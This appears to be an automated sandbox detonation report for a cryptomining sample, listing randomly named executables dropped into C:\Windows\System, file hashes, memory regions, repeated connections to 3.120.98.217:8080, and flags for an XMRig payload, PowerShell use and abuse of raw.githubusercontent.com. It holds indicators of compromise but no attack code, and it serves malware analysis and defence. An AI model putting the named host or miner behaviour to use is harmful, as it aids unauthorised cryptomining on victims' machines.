C:\Windows\System\dThbXNh.exe

C:\Windows\System\WCdijYF.exe

C:\Windows\System\WCdijYF.exe

C:\Windows\System\ZMBgrjd.exe

C:\Windows\System\ZMBgrjd.exe

C:\Windows\System\cdJFauC.exe

C:\Windows\System\cdJFauC.exe

C:\Windows\System\kKcHzJI.exe

C:\Windows\System\kKcHzJI.exe

C:\Windows\System\AfasGtp.exe

C:\Windows\System\AfasGtp.exe

C:\Windows\System\FVbXVxZ.exe

C:\Windows\System\FVbXVxZ.exe

C:\Windows\System\ARqSTLy.exe

C:\Windows\System\ARqSTLy.exe

C:\Windows\System\DtTDhqw.exe

C:\Windows\System\DtTDhqw.exe

C:\Windows\System\KWQIKBB.exe

C:\Windows\System\KWQIKBB.exe

C:\Windows\System\vyrtOKU.exe

C:\Windows\System\vyrtOKU.exe

C:\Windows\System\cWCNeCF.exe

C:\Windows\System\cWCNeCF.exe

C:\Windows\System\rLJWBtf.exe

C:\Windows\System\rLJWBtf.exe

C:\Windows\System\taxGnSM.exe

C:\Windows\System\taxGnSM.exe

C:\Windows\System\xPldIAl.exe

C:\Windows\System\xPldIAl.exe

C:\Windows\System\GOYshcc.exe

C:\Windows\System\GOYshcc.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/1132-1-0x000000013F7D0000-0x000000013FBC6000-memory.dmp

memory/1132-0-0x00000000001F0000-0x0000000000200000-memory.dmp

\Windows\system\FDLeIvg.exe

MD5 c3ecd6a26ddfbb83b17c30629703daf9
SHA1 bce6820d065feaf5d85dbd2293d3a0fc388fd95a
SHA256 fad038b646ae37b63d76055231c27842b61d47922b6d0c0df2e893c181ed4d91
SHA512 ea3c946cb49416443f0efd5b3115a3f01e1b72109e7989aacd94a98648895ff264302512c43db182c00df6beda5a3a4c5d5c27ea6c53e0a84013ab5395f07a9e

C:\Windows\system\NBwwSeE.exe

MD5 9c0edd99d9c529210184486f31d26012
SHA1 f6fd05f29fc0b44cf2baad25a9eb5bccc2e4cacf
SHA256 969cc8782d1583b2b875a99472496ee6439c12e455877a140979d5a1d68dfcf8
SHA512 f22f83bcfd48b5c14d4e5df11f9d590cdf157e6b4fb48e4e35b7f89bb845fb6ecdf2d9696158eee93baddf5e7995a6e072f23c1f6a78f5aeed22939e63123d8c

C:\Windows\system\oGCXxxs.exe

MD5 a6f56acad21cc1a32c82ec73f1382446
SHA1 a43fecab98b6b69357c4f17af8cf4c4bdd386c96
SHA256 ce9f9b69cf329f4b540d3cee6c0795a4460b1b1384e503e215f702fc448f56bb
SHA512 6f0aa598968d783dc8e4c7acfbda617e4819db7037d1b75f931ebba4f92c4dc5a648ef2fab3aeee963f0501c521f06815e2e5f7558e26adf1b784bdca986ce04

memory/1420-20-0x000000013FE90000-0x0000000140286000-memory.dmp

memory/2636-22-0x000000013FFA0000-0x0000000140396000-memory.dmp

memory/1132-18-0x000000013FFA0000-0x0000000140396000-memory.dmp

memory/1132-17-0x000000013FE90000-0x0000000140286000-memory.dmp

memory/2628-16-0x000000013FF30000-0x0000000140326000-memory.dmp

C:\Windows\system\WfHbuen.exe

MD5 1740ba0bd4f2d10ce27fd76cf6726a5b
SHA1 bb4d021c21291386d23bbb5ddb60b92a97c25c9d
SHA256 42d8c1286470aa75d6fd2c7d33c32845e30584019c7374d188f684c1a6bc808a
SHA512 8b1c741c5c9af6a6ef6ca5decc37a3e0ce5393139584796b3e09a16f8b0c5bea7e84f9359b89d218dc87a31b49907eb420c76ce8594304bde209aa54b3ef8b28

memory/1132-29-0x000000013F170000-0x000000013F566000-memory.dmp

C:\Windows\system\OdJEkua.exe

MD5 dfdb86e68d39b19888ede806da6e57c7
SHA1 20a3fabd11a5360b861fd865a3ebe99554bbd18d
SHA256 4fd21b75f55c3dc47e50fe90e64c4c664cdf22967422582b95fa82cd7aaf3b3a
SHA512 aa3f7a1d8a3ff3ea90189d1de3b63618ddb0dec736cd33bdbd54e7a7cd3e9db9617d28f69be74542147d9d47f60d553b95600acebf6376f3829ba35338a97e2b

C:\Windows\system\IIkAmVd.exe

MD5 ccfa7c3e551556dae5d6540658d7e1fc
SHA1 72cf398f39d2527614e652df9c0981bdb5aaa5fa
SHA256 1366f12f5f2b5794e320f0119281c7417e365fab6e4b48fab4310454cfaf998f
SHA512 4919f8121a5f5a5647a98dcdafdc3a2b4384bfe2a6417655218219012f15d767522655bc97cdd13db7970917f21c5e7e689336b6c466c31d6620331e4bb1751d

memory/1132-49-0x00000000033C0000-0x00000000037B6000-memory.dmp

C:\Windows\system\dnGebKH.exe

MD5 26ab04b5aa286b6e111c7ae63e871095
SHA1 0533beb0995c405e8db3a5864022870559327592
SHA256 fd809f1a080ffd6eabe1e30e5c43e2a0111982e751673138f087595391228715
SHA512 235537e0d571f3b3e4e3016178a55cc1fb35cc5e30163e4cce91c6d60abef8a4ec1627dbbc8979a15762e9b8ad16b972642efc046aca606c53f1d42136fec2cb

memory/2488-57-0x000000013FC60000-0x0000000140056000-memory.dmp

memory/2908-65-0x000000013F0C0000-0x000000013F4B6000-memory.dmp

C:\Windows\system\bJNRUtZ.exe

MD5 338451587b039b56efa325a26f5ad155
SHA1 e248a3e5e5f990f164e2a29d42c065dcf3433829
SHA256 ff07ee85827f7566b7fbf201fb04bbc2b6ffab89c2ecd1dc895e85972ced0ed6
SHA512 312b3f93cf26fa58b5e0e43b1e4af654b632d1ab860ed549e0b4655644b52a62f14da68ef1cc0d3074a41464bb09c0f9bbf7d7ca88f5340f3a85f4e99aeb328f

C:\Windows\system\XDfVSGN.exe

MD5 715247239f1434466c60f9a5af098c5c
SHA1 2b0d5de2548d5250e054578fca00ff9398c4362e
SHA256 2a04c7cfe6f101d4a7e8a723b05a1b0921444ce8836e16d64ffc6f8f6f598f81
SHA512 ca62a64d96f735e83a37d7c4f393252351fc722f2c6ce3ae5cfbffff9cde9f6fd061868d3f3184a160e4e4db151264e57359df65ba17c36f87a969f5dcb4921d

memory/2540-86-0x000000013F230000-0x000000013F626000-memory.dmp

C:\Windows\system\FxhehAh.exe

MD5 ad4e4c6cb988302012b4e92c5fcc7abc
SHA1 d36deeb8f1522511fd1a31a18a1ab04978b52951
SHA256 b4e821236f4393315a16af513203bafb217fbe7b8616a71e4f37af0f4116f0dd
SHA512 0297996b49ffc66b094cf6e4d79e43922ce847f131ad6c3eb1913e8689bfae4f49ce8c6de1264c2325af128971ec66e68a13be6b60a294990d9b25db69d782d2

C:\Windows\system\YrFARoH.exe

MD5 082431179dfcb43243d7c6bb73e8b035
SHA1 870fb7fa96f4e451514fe01f8a974cf294b15b1c
SHA256 61c670209677f993bd807146e759c34fa4433c92eab856127c7c10706c5a8ce2
SHA512 fa1b8607bccf00774e24c388b5ad982dd7f56786730bf7ea7e80ec3eca604d88f0aed3f928456149c8f2728eb337ad469e76d73d05ef800dfa233da710d1b8ef

C:\Windows\system\vFhHTeW.exe

MD5 5ac3e7fa058f4a0204d2a7cade1941a2
SHA1 eb8692e55b1ca13ffd4d0e41f852a53f5855aee9
SHA256 20b436f9e7df3ad7e4f10417978442fd3cfe51f87acdffdde3b389e925912ee5
SHA512 03acf2d18437f3f0b823e21340f26547a012cdf684638be2d44ba296c607b1ac969331eb4d2f1163107c4eef2506d1a4ca2ea6bb369c5cd4353624c6b64d9760

C:\Windows\system\ZxoLqxz.exe

MD5 c7b3a02a306f549416e1e1e6151cb0c4
SHA1 94513fbeafff73c9ef029015c79d65593881eb53
SHA256 ce4858a4a12a75fbf4b191c6f549749ba0e0ebc4e0215704ae8ca008d1275a4e
SHA512 b80443eff11e0903588d2e6f0c9a424469b0b7b90d4b42fe0a24b1fecd4a99f1c8573d689c4357b8e4d1fc05fe9354d2d28d9088c5b9b44287ac05d7b2e9030d

C:\Windows\system\cqUHqOD.exe

MD5 2dbfa8ab6211598d3d63e0cc6bf9e4f0
SHA1 e8b26eeaf9cd04275736fa0d6989388b5cb4c519
SHA256 9cf5059f706afca3fb633ed2d070b09c4fc7817017e9b313ccf737666445bcd5
SHA512 f1cfb26b2079f5186f1c5f24a782d0d31176446d2f7d5ca807c7ce1787eb8f0a08838e527e4d604c21ae06d5cb6b7fce04e4b1896745c5df40fefd15bcc57ea1

C:\Windows\system\taIAGlq.exe

MD5 8ee6ef007a7a787502a9af8f8a658a61
SHA1 94a890c7e880da75caae694ca4d22b64940fb94f
SHA256 0a0d196260fd205b0a65c503618479901ab3139a7d894c61c58dd884868ede5a
SHA512 3b333dff81daf467a67bf37f68fb325d5e7e4453b44af14c32b14d8f8210d77bd60971d986eb91e202ddd13bf898bc62d0a12114b0c276b063d012e6a79140fa

C:\Windows\system\zfHJQCJ.exe

MD5 6208d8e07cef057d93c233e6128161a9
SHA1 b55d8e161895d8aee23b6305ba6fcdb47215185c
SHA256 6948aa2fd42dd78a479e21652c62f82d82ad0fcf50b3a882a10bc453b80f6f32
SHA512 96a51ffc1945433c6c3cc91851c412e63a7a09d27910f7c459ade8ef450648e6e79175166e3688993eed0c9d2bebba79ef4a7090159bac51fb025882fc809de0

C:\Windows\system\ZApfqSP.exe

MD5 7fe2f47c5931db6f920724adc4e07078
SHA1 82603defa6d66f5363db94f37cfdc99ad7e3ed4e
SHA256 fe65d70b911f98fbaffbcb656beedb9780e13bf7a20d24744449fd6a0d2020c9
SHA512 4b376609b6192490faae737fd7903815b7836097bf26542cf0f7f863b29afd714742e500170211a59cb9cfb1b666b2050cfaa1e9f8d9d35a2b44f052bb821571

C:\Windows\system\CMNPxpd.exe

MD5 747e9b19c07b1d487f43d57af2a7eda0
SHA1 4dd623a394a4d8f3f308857c50ff8280783721eb
SHA256 1d2cce482676b3f7eeaed1fd878642e614116280f4b6b0f9a8bafd97152e9faf
SHA512 1078884a17c4164ce316b5d6b8a5b02e61dc252e0ff57387b550e691de5f272fe64db8d036dad96ee0ebb1f2d8fe379c124372a53054b339cd5483d3dc90b985

C:\Windows\system\vnqFrqL.exe

MD5 45e30e820e9bbb49c338aa986248e7ff
SHA1 dc68cadef050989c181fc8a02b8b8b02026842f3
SHA256 14f3dbf982238a4f24ed9a9226605adeb7a525b95c1c308f7681bf6e1f2141cf
SHA512 fe5f20e34697499008f7c10c044eeb43a2f74b75b9697d2a9d53e9c9dc73f7d645feb953650ccf81c700f5fc326b0a644bd994b74d6c3d1c52245dc3321e35ad

C:\Windows\system\Ncmakup.exe

MD5 20623130164aa228fd3d7c5ead8b15e5
SHA1 e2b4f5f4520c7a36102ed191c95112bbd6e08ad7
SHA256 684ff50ec971f3616c0fe7f66cb383104c40e323e117f41dc6d1a3eb3d0dc48b
SHA512 adf553ff3005b650c6a7f50261ed70bd9630208704c467ba292027dee1f5bce1c8be8a92b900ca82236f554b6b78fb83feb1fe9e98976d5abf32d15e99cfa6e2

C:\Windows\system\vAJZOHV.exe

MD5 28e4f14b1ffe3644ee8522faf19c01eb
SHA1 bfee295a9d489f41b33622cd2ce521a7b3e27bd6
SHA256 d0d8987714b62f20db0d18d147e7ea3886de1ac7ee28d1125e98455be2100224
SHA512 9381c3621993c3cfc8a3fce02f61e5bfe530e71d5469439edb8d38b72f35b103f984e5214d7b96af5a597cf4fdb48ddf13f2fd6e7c13f4060a969fa86061cd7c

C:\Windows\system\OBBmTtL.exe

MD5 eb45799485ef74b11e42e44ee89d6645
SHA1 de0d87f77d2f0f370605f4c9bf14a7fefccb422b
SHA256 7072316e2a1070ae207da1ccf5f3bb01aed484b5fa0c3200d6cfd05c9abd290b
SHA512 094eb49f4c60cf5cb3817f1086bd6b240d8691a1fb376e70ff4d83b1cf84d559c30c8af9ffa223518ced07c2b60ce5a36ed470bb84c54fc2b15e3758fd3ec8ec

C:\Windows\system\axIkokP.exe

MD5 56d0daeb52ff1258f4cb2fe0fbe3eeee
SHA1 f69c4bec1fb8aad50a894f6421251930de90faf4
SHA256 92dc3ea47f4abe250cc6b6e2d9c8b7933b0611de1510d82aa4c17fd8ae07c74d
SHA512 f296ac55c114d7445dcb6c75fac060888c4a1568b336d73c0b43308b23471f1f0d9a3f570831e260de116e9a9971cbe57dd602fd155332976a16a520392d104f

C:\Windows\system\gdOLxKL.exe

MD5 31acd547c29a31660095418fd3146998
SHA1 83bb8ffb01e67e2beaca4fca47bb19b01c853f0e
SHA256 0c565f39a7dbcd8df3684b992cf9b0a63de5e767537021ee40e1ac482a793e0f
SHA512 485452c96d35e4cac78d66bfb0444f18e179c7e6232a429922c350474e93020a061b28851129ce9e6536b4a6926ef54f53d52204999454c1af76416bdd1c6b57

C:\Windows\system\voSvWQc.exe

MD5 8b9bafb8571f9d1e5cc52a2a59f70f15
SHA1 81dc23a80650923a41f2bfa0b98e4c582d820c04
SHA256 454c0f5b812364e22f00cc45c5a6de6ebcbe097dcd372ae9e4954805c9288b12
SHA512 c2014b59b73b289d02613e5784e4e9c1ca36eb9c9be07bd5d54f7c2a9b6a7000ed401de159704a6d5389232b09acda98b5439ac7d39159fe0b938d4a94d64e68

C:\Windows\system\iYabiuZ.exe

MD5 73ec0f136f421e1d77026f5090ca4ab0
SHA1 9c2b98696e0aeee7f373e252571c93ce6c5b2e5a
SHA256 87fd39a296449ff8bc28476a0c9e6f5250f6ca62943d9631286f7a2a8ce1ce2a
SHA512 bcc5f4c7f5e7c142206a8bd03f80658db9a19da0ec0456f603255437842c4c4d923cad475bff3fab20a1636dfa77117e545d92ecddbde3957c7259af92e4ec0e

C:\Windows\system\waHeSAk.exe

MD5 a4f741f295c4630b9140961bc09b126d
SHA1 b1ec0f5808372e19b00718b86099afb84a91b371
SHA256 32122b0098fa40def8e7b47b0775324db93ef0f6eb16ea61d0061abbcd1e6aa7
SHA512 a1d44763541a596fed4445d27700e374dc83b04e2513537d9c85e0fc2e1dc86fbd66f7435cf0be951a42674570af029181e13f23ae6205dcd85e624be9d0b671

C:\Windows\system\jrSOrkG.exe

MD5 6aa028ab768217bf5332bae72f5a7980
SHA1 5b0f1e1b1e585d18e5c32afdaaad1c9a55b35d09
SHA256 4305775126c11db69e3c4633faccc0ea65458587e75c7ae697d9788de49e6bbc
SHA512 4c80d8bda0452ab5efcd0e274732aab17e7c8d3e06d1bcdaabfd251f7fd9714ab49a54759c731ac8a623a847be2210f9177d94b8cc807787cc34b2c13c21da91

C:\Windows\system\diKaaKt.exe

MD5 08c9f6b5b12e59919aa9f81354be2efa
SHA1 759c43ff41d6a395aac824af4a36eac969a69115
SHA256 c3cad4063928e7000f2569f607507dfb5d812dd8b787b927de6774e7e21656f2
SHA512 6bbe9b63cea81752774a67bdf664746aca0744cdf903378edc77e29e5eec0ac09f7514f131114b9fc68dedc2340099de580dc2d8fe378ee60fe7b9b1464712c1

memory/1132-85-0x000000013F230000-0x000000013F626000-memory.dmp

memory/2720-79-0x000000013F940000-0x000000013FD36000-memory.dmp

memory/1132-77-0x00000000033C0000-0x00000000037B6000-memory.dmp

memory/1420-76-0x000000013FE90000-0x0000000140286000-memory.dmp

memory/312-71-0x000000013F390000-0x000000013F786000-memory.dmp

C:\Windows\system\HDhVHCy.exe

MD5 4654518f8f2fd9166d8a605cead37e3e
SHA1 afc8ad8402801bd8bd4fef6743761fed7e4f0605
SHA256 a29b1982d01d36b10916593630611e9ae665fbfc25741547cd1881b2c34fdf9a
SHA512 005b4e7d719c4c504b309f38832fbefd092e657a6e2b00a87455c2d882e42720f1f330571c8dd7bb02df8a3062ba7c5f84c88bc8254048dc05e3a22d4eb7339f

memory/1132-64-0x000000013F0C0000-0x000000013F4B6000-memory.dmp

memory/1132-63-0x000000013F7D0000-0x000000013FBC6000-memory.dmp

memory/1132-56-0x000000013FC60000-0x0000000140056000-memory.dmp

C:\Windows\system\IQchZOJ.exe

MD5 3cc96f51472b598c126a213d553c068f
SHA1 39f82286907f5806e8f9844d426f406ce37c53eb
SHA256 00a697d38677aa211690d8b5024a797fe620e1965ad974050245375e68d5a581
SHA512 f4eb249813f77b4027e424b68bacc82f4000da98ee0633313ef861cb6c5fbf8c3933935b78eb866c17e6fd13caa1bfbbb343a54f220f0612c3c83d4e02709cdc

memory/2648-50-0x000000013F7E0000-0x000000013FBD6000-memory.dmp

memory/2196-43-0x000000013FD80000-0x0000000140176000-memory.dmp

memory/1132-37-0x00000000033C0000-0x00000000037B6000-memory.dmp

memory/2476-36-0x000000013F7B0000-0x000000013FBA6000-memory.dmp

memory/2668-35-0x000000013F170000-0x000000013F566000-memory.dmp

C:\Windows\system\HOOeZOI.exe

MD5 d2e0f716048e81e6cd5b7ec575d859b7
SHA1 993632478e3cec2a5fac7706b79ab10f153ca9bc
SHA256 5b7b02cd62f628afaca760a3adea9b5e4cae265cea771de091140be12b304a77
SHA512 3ad99fb674d3029fa6cdec07814e370c72b1bd01acde6528494c91aa388207f91928550ce5394cb2dafe4ffc987f6d728bddf704ce5d1a087dfea02089cac787

memory/1132-6-0x000000013FF30000-0x0000000140326000-memory.dmp

memory/1132-1810-0x00000000033C0000-0x00000000037B6000-memory.dmp

memory/2352-2000-0x000000001B840000-0x000000001BB22000-memory.dmp

memory/2352-2385-0x0000000002390000-0x0000000002398000-memory.dmp

memory/1132-2564-0x00000000033C0000-0x00000000037B6000-memory.dmp

memory/1132-3604-0x00000000033C0000-0x00000000037B6000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 04:39

Reported

2024-05-27 04:42

Platform

win10v2004-20240508-en

Max time kernel

91s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\BbILbNR.exe N/A
N/A N/A C:\Windows\System\YSzmzNr.exe N/A
N/A N/A C:\Windows\System\sNPBSte.exe N/A
N/A N/A C:\Windows\System\cDlKgIM.exe N/A
N/A N/A C:\Windows\System\OcvtfSa.exe N/A
N/A N/A C:\Windows\System\XvSovNm.exe N/A
N/A N/A C:\Windows\System\RmbuPMS.exe N/A
N/A N/A C:\Windows\System\AifRhrl.exe N/A
N/A N/A C:\Windows\System\jmolJex.exe N/A
N/A N/A C:\Windows\System\yzyFNDu.exe N/A
N/A N/A C:\Windows\System\TWfBhyl.exe N/A
N/A N/A C:\Windows\System\dMVezvJ.exe N/A
N/A N/A C:\Windows\System\hMFYspB.exe N/A
N/A N/A C:\Windows\System\CKvnawf.exe N/A
N/A N/A C:\Windows\System\OpcdrdU.exe N/A
N/A N/A C:\Windows\System\PJkIOfS.exe N/A
N/A N/A C:\Windows\System\ewLPSlc.exe N/A
N/A N/A C:\Windows\System\ImsojAq.exe N/A
N/A N/A C:\Windows\System\OBieAyf.exe N/A
N/A N/A C:\Windows\System\SSEAqWy.exe N/A
N/A N/A C:\Windows\System\UZuLrCf.exe N/A
N/A N/A C:\Windows\System\WsNTkOU.exe N/A
N/A N/A C:\Windows\System\YsxoCUY.exe N/A
N/A N/A C:\Windows\System\UMYLiIQ.exe N/A
N/A N/A C:\Windows\System\LwONxde.exe N/A
N/A N/A C:\Windows\System\rHAvdEG.exe N/A
N/A N/A C:\Windows\System\UiRrkAA.exe N/A
N/A N/A C:\Windows\System\bqdBunV.exe N/A
N/A N/A C:\Windows\System\yCxjQNU.exe N/A
N/A N/A C:\Windows\System\veiZvSY.exe N/A
N/A N/A C:\Windows\System\xSKtnqe.exe N/A
N/A N/A C:\Windows\System\GDMbIJy.exe N/A
N/A N/A C:\Windows\System\pFdsJzJ.exe N/A
N/A N/A C:\Windows\System\NRSJYQY.exe N/A
N/A N/A C:\Windows\System\kudxvcG.exe N/A
N/A N/A C:\Windows\System\vAyXyze.exe N/A
N/A N/A C:\Windows\System\aaDWODH.exe N/A
N/A N/A C:\Windows\System\rBeulIc.exe N/A
N/A N/A C:\Windows\System\VjZFZfk.exe N/A
N/A N/A C:\Windows\System\BPdaQpx.exe N/A
N/A N/A C:\Windows\System\CLpPKqz.exe N/A
N/A N/A C:\Windows\System\CcaJvKP.exe N/A
N/A N/A C:\Windows\System\CuzYLen.exe N/A
N/A N/A C:\Windows\System\xjNUBAg.exe N/A
N/A N/A C:\Windows\System\qEvKjnO.exe N/A
N/A N/A C:\Windows\System\SWFNthQ.exe N/A
N/A N/A C:\Windows\System\ozziSUh.exe N/A
N/A N/A C:\Windows\System\gqhuACd.exe N/A
N/A N/A C:\Windows\System\NfIjDUa.exe N/A
N/A N/A C:\Windows\System\MiwOIvH.exe N/A
N/A N/A C:\Windows\System\XUGyOPf.exe N/A
N/A N/A C:\Windows\System\wEWejht.exe N/A
N/A N/A C:\Windows\System\bYjSWxn.exe N/A
N/A N/A C:\Windows\System\FQFoqag.exe N/A
N/A N/A C:\Windows\System\XgcCnUF.exe N/A
N/A N/A C:\Windows\System\liOAaaM.exe N/A
N/A N/A C:\Windows\System\KRsDfBu.exe N/A
N/A N/A C:\Windows\System\oPeRwhc.exe N/A
N/A N/A C:\Windows\System\gSTQiqp.exe N/A
N/A N/A C:\Windows\System\QRQjcvS.exe N/A
N/A N/A C:\Windows\System\PgotAzJ.exe N/A
N/A N/A C:\Windows\System\pAKuoIM.exe N/A
N/A N/A C:\Windows\System\aJYpXFU.exe N/A
N/A N/A C:\Windows\System\MVQdaEj.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\jDDNLhF.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\xfQgKax.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\gSTQiqp.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\MhqfGXl.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\VHwsKyy.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\ilqyGxv.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZNWWTIT.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\wDARaTu.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\JUOAwbw.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\FgISMmz.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\pWVadIH.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\zBSOuAF.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\krAFPPp.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\okWWTRO.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\fuOhKFq.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\yOkxLmh.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\hMMROuH.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\XUGyOPf.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\uaOInBr.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\slzigXQ.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\WGtbnay.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\uCvLFxC.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\ObeXwKZ.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\UrlAzxA.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\agDdxKS.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\CdzlClM.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\GDMbIJy.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\MiwOIvH.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\bjfPVVT.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
